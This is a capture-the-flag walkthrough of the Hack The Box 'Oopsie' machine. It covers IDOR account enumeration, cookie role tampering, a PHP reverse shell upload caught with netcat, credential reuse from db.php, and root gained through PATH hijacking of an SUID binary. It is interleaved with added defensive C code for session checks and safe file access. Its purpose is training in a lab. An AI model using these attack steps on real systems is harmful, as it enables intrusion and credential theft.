$ sudo nmap -p- -A -T4 10.10.10.28
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
$ nikto -h 10.10.10.28
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-10944: : CGI Directory found
+ OSVDB-10944: /cdn-cgi/login/: CGI Directory found
+ OSVDB-3233: /icons/README: Apache default file found.
+ 10293 requests: 0 error(s) and 10 item(s) reported on remote host
$ dirb http://10.10.10.28
---- Scanning URL: http://10.10.10.28/ ----
==> DIRECTORY: http://10.10.10.28/css/
==> DIRECTORY: http://10.10.10.28/fonts/
==> DIRECTORY: http://10.10.10.28/images/
+ http://10.10.10.28/index.php (CODE:200|SIZE:10932)
==> DIRECTORY: http://10.10.10.28/js/
+ http://10.10.10.28/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://10.10.10.28/themes/
==> DIRECTORY: http://10.10.10.28/uploads/
admin@megacorp.com
Log in at http://10.10.10.28/cdn-cgi/login/ with username admin and password MEGACORP_4dm1n!!
http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
This action require super admin rights.
Burp Suite
Start Burp Suite with its proxy enabled, then open a browser and go to http://10.10.10.28. On the Target tab we notice that Burp has passively spidered the website while processing the requests. We go to /cdn-cgi/login, refresh the Accounts page, which displays the user id for our current user, and intercept the request. We notice what seems to be a custom cookie implementation, comprising the user value and the role. We also notice the id parameter, which for our current admin user is 1.
GET /cdn-cgi/login/admin.php?content=accounts&id=1 HTTP/1.1
Host: 10.10.10.28
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: user=34322; role=admin
Connection: close
It might be possible to brute force the id values and display the user value for another user, such as the super admin account. We can do this using Burp's Intruder module: press Ctrl+I to send the request to Intruder.
We press Clear to remove the pre-populated payload positions, select the id value (1), and click Add. Next, click on the Payloads tab.
We can generate a sequential list of 1-100 using a simple bash loop.
$ for i in $(seq 1 100); do echo $i; done
Paste the output into the Payloads box.
Next, click on the Options tab, and ensure that Follow Redirections is set to "Always", and select the option to "Process cookies in redirections".
Click on the Target tab, and then click Start attack. We sort responses by Length and view the results.
http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=30
Repair Management System
Access ID Name Email
86575 super admin superadmin@megacorp.com
Let's try to access the Uploads page again, substituting the super admin's access ID, 86575, for our own user cookie value (this replacement had to be made twice).
http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
Repair Management System
Branding Image Uploads
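Two things made the escalation above possible: the role is carried in a client-controlled cookie, and the access ID that serves as the session token is both guessable through the id parameter and displayed on the Accounts page. The C program below is an added example written for this write-up, not code from the site or from Hack The Box; it shows the server-side check a defender would want instead. The session table, the cookie name `session` and the token values are constructed assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Server-side session store (constructed sample data, not from the page).
 * A real application keeps this in a database or session backend; the point
 * is that the role and the owning account live here, not in the cookie. */
struct session {
    const char *token;   /* random, unguessable; never displayed to other users */
    int user_id;         /* account the session belongs to */
    int is_super_admin;  /* authoritative role */
};

static const struct session SESSIONS[] = {
    { "c4f1a9b2e8d74c0f", 1,  0 },   /* ordinary admin, account id 1  */
    { "9e0b7d3c5a21b6e4", 30, 1 },   /* super admin,    account id 30 */
};

/* Copy the value of cookie `name` out of a Cookie header.
 * Returns 0 on success, -1 if the cookie is absent or too long. */
int cookie_value(const char *header, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p = header;
    while (p && *p) {
        while (*p == ' ' || *p == ';') p++;
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, ';');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen >= outlen) return -1;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 0;
        }
        p = strchr(p, ';');   /* skip to the next cookie */
    }
    return -1;
}

static const struct session *lookup_session(const char *token)
{
    for (size_t i = 0; i < sizeof SESSIONS / sizeof SESSIONS[0]; i++)
        if (strcmp(SESSIONS[i].token, token) == 0)
            return &SESSIONS[i];
    return NULL;
}

/* Object-level authorization for admin.php?content=accounts&id=N.
 * Anything the client sends besides the session token (such as role=admin)
 * is ignored. Returns 1 if the request may proceed, 0 otherwise. */
int authorize_account_view(const char *cookie_header, int requested_id)
{
    char token[64];
    if (cookie_value(cookie_header, "session", token, sizeof token) != 0)
        return 0;                          /* no session cookie at all */
    const struct session *s = lookup_session(token);
    if (!s)
        return 0;                          /* unknown or forged token */
    if (s->is_super_admin)
        return 1;                          /* role taken from the store */
    return s->user_id == requested_id;     /* others may only view themselves */
}
```

With this check, sending role=superadmin or iterating id=1..100 changes nothing for an ordinary session, and there is no per-user access ID on the page to copy into the cookie because the token is never rendered.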
kali@kali:~/0.htb/Starting_Point/Oopsie28$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php
Upload the reverse shell rev.php through the Branding Image Uploads form.
The file rev.php has been uploaded.
Then set up a listener and trigger the reverse shell using curl:
$ curl http://10.10.10.28/uploads/rev.php
kali@kali:~/0.htb/Starting_Point/Oopsie28$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.28] 39410
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:15:52 up 2:49, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
robert pts/0 10.10.16.41 21:31 1:36m 0.17s 0.08s /bin/bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z                  (suspend the shell to get back to the local terminal)
stty raw -echo
fg
reset
xterm                   (terminal type, typed at reset's prompt)
$ cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
$ ls /var/www/html/cdn-cgi/login
admin.php
db.php
index.php
script.js
$ cat /var/www/html/cdn-cgi/login/db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ id robert
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
www-data@oopsie:/$ find / -type f -group bugtracker 2>/dev/null
/usr/bin/bugtracker
www-data@oopsie:/$ ls -al /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
www-data@oopsie:/$ /usr/bin/bugtracker
bash: /usr/bin/bugtracker: Permission denied
www-data@oopsie:/$ su robert        (password M3g4C0rpUs3r! from db.php, reused for the local account)
Password:
robert@oopsie:/$
robert@oopsie:/$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 1
---------------
Binary package hint: ev-engine-lib
Version: 3.3.3-1
Reproduce:
When loading library in firmware it seems to be crashed
What you expected to happen:
Synchronized browsing to be enabled since it is enabled for that site.
What happened instead:
Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects.
robert@oopsie:/$ strings /usr/bin/bugtracker
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
strcpy
__isoc99_scanf
__stack_chk_fail
putchar
printf
strlen
malloc
strcat
system
geteuid
__cxa_finalize
__libc_start_main
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
------------------
: EV Bug Tracker :
------------------
Provide Bug ID:
---------------
cat /root/reports/
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7697
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
strcpy@@GLIBC_2.2.5
_edata
strlen@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
concat
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
malloc@@GLIBC_2.2.5
__bss_start
main
__isoc99_scanf@@GLIBC_2.7
strcat@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
The strings output shows the binary links system() and contains the literal "cat /root/reports/", so it runs cat by name through the caller's PATH, and it is SUID root (-rwsr-xr--). A fake cat placed earlier in PATH therefore runs as root:
robert@oopsie:/$ export PATH=/tmp:$PATH
robert@oopsie:/$ cd /tmp
robert@oopsie:/tmp$ echo '/bin/sh' > cat
robert@oopsie:/tmp$ chmod +x cat
robert@oopsie:/tmp$ ls
cat
robert@oopsie:/tmp$ ls -la
total 12
drwxrwxrwt 2 root root 4096 May 2 14:41 .
drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
-rwxrwxr-x 1 robert robert 8 May 2 14:41 cat
robert@oopsie:/tmp$ /usr/bin/bugtracker
# id
uid=0(root) gid=1000(robert) groups=1000(robert),1001(bugtracker)
# cd /root
# ls -la
total 48
drwx------ 8 root root 4096 Mar 20 2020 .
drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
lrwxrwxrwx 1 root root 9 Jan 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jan 24 2020 .cache
drwxr-xr-x 3 root root 4096 Jan 25 2020 .config
drwx------ 3 root root 4096 Jan 24 2020 .gnupg
drwxr-xr-x 3 root root 4096 Jan 23 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 2 root root 4096 Jan 24 2020 reports
-rw-r--r-- 1 root root 33 Feb 25 2020 root.txt
drwx------ 2 root root 4096 Jan 23 2020 .ssh
-rw------- 1 root root 1325 Mar 20 2020 .viminfo
# cat root.txt          (no output: cat now resolves to /tmp/cat, which just spawns another shell, so use less instead)
# less root.txt
# less root.txt
WARNING: terminal is not fully functional
af13b0bee69f8a877c3faf667f7beacf
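The privilege escalation works because of what the strings output already shows: the binary calls system() on "cat /root/reports/" plus the user's input, so the command word cat is resolved through the caller's PATH, and it runs setuid root. The program below is an added example written for this write-up; it is not the source of /usr/bin/bugtracker, which is not on the page. The first function reconstructs the presumed command-building pattern as an assumption and is never executed; the rest is a hardened version that accepts only a numeric ID, builds an absolute path with a bounded write, and reads the file directly instead of spawning a shell. The base directory /root/reports is the one named in the strings output.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define REPORTS_DIR "/root/reports"

/* Assumed shape of the original (reconstructed from the strings output, not
 * the real source): the ID is concatenated onto "cat /root/reports/" and the
 * result handed to system().  Two defects: "cat" is looked up through the
 * caller's PATH, and the ID is never validated.  Shown only for contrast. */
void vulnerable_command_for(const char *bug_id, char *out, size_t outlen)
{
    snprintf(out, outlen, "cat " REPORTS_DIR "/%s", bug_id);
    /* original presumably: strcpy/strcat into a malloc'd buffer, then system(out) */
}

/* Hardened: accept only a decimal ID, build an absolute path with a bounded
 * write, and never involve a shell.  Returns 0 on success, -1 if rejected. */
int build_report_path(const char *base_dir, const char *bug_id, char *out, size_t outlen)
{
    size_t len = strlen(bug_id);
    if (len == 0 || len > 10)
        return -1;                                   /* empty or absurdly long */
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)bug_id[i]))
            return -1;                               /* rejects '/', '.', ';', ... */
    int n = snprintf(out, outlen, "%s/%s", base_dir, bug_id);
    if (n < 0 || (size_t)n >= outlen)
        return -1;                                   /* would have truncated */
    return 0;
}

/* Read the report with fopen() instead of spawning "cat".
 * Returns the number of bytes copied into buf, or -1 on error. */
long read_report(const char *base_dir, const char *bug_id, char *buf, size_t buflen)
{
    char path[4096];
    if (build_report_path(base_dir, bug_id, path, sizeof path) != 0)
        return -1;
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    size_t n = fread(buf, 1, buflen - 1, f);
    buf[n] = '\0';
    fclose(f);
    return (long)n;
}

/* If a child process is unavoidable, use an absolute program path and a
 * clean environment so the caller's PATH cannot redirect it. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };
int run_cat_safely(const char *path)
{
    char *const argv[] = { "/bin/cat", (char *)path, NULL };
    execve("/bin/cat", argv, CLEAN_ENV);   /* only returns on failure */
    return -1;
}

int main(void)
{
    char id[32], buf[4096];
    printf("Provide Bug ID: ");
    if (scanf("%31s", id) != 1)
        return 1;
    long n = read_report(REPORTS_DIR, id, buf, sizeof buf);
    if (n < 0) {
        fprintf(stderr, "invalid or unreadable report id\n");
        return 1;
    }
    fwrite(buf, 1, (size_t)n, stdout);
    return 0;
}
```

Even with these changes a setuid-root helper remains a sensitive binary: restricting who may execute it (as the bugtracker group does here) and keeping the PATH of privileged processes free of user-writable directories are the complementary controls.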
kali@kali:~/0.htb/Starting_Point/Oopsie28$ ssh robert@10.10.10.28
robert@oopsie:~$
$ export PATH=/tmp:$PATH
robert@oopsie:/tmp$ /usr/bin/bugtracker
# ls -la
total 16
drwxr-xr-x 2 root root 4096 May 2 15:10 .
drwxr-xr-x 3 root root 4096 Jan 25 2020 ..
-rw-r--r-- 1 root root 646 Sep 11 2020 filezilla.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3>
<RecentServers>
<Server>
<Host>10.10.10.46</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass>
<Logontype>1</Logontype>
<TimezoneOffset>0</TimezoneOffset>
<PasvMode>MODE_DEFAULT</PasvMode>
<MaximumMultipleConnections>0</MaximumMultipleConnections>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>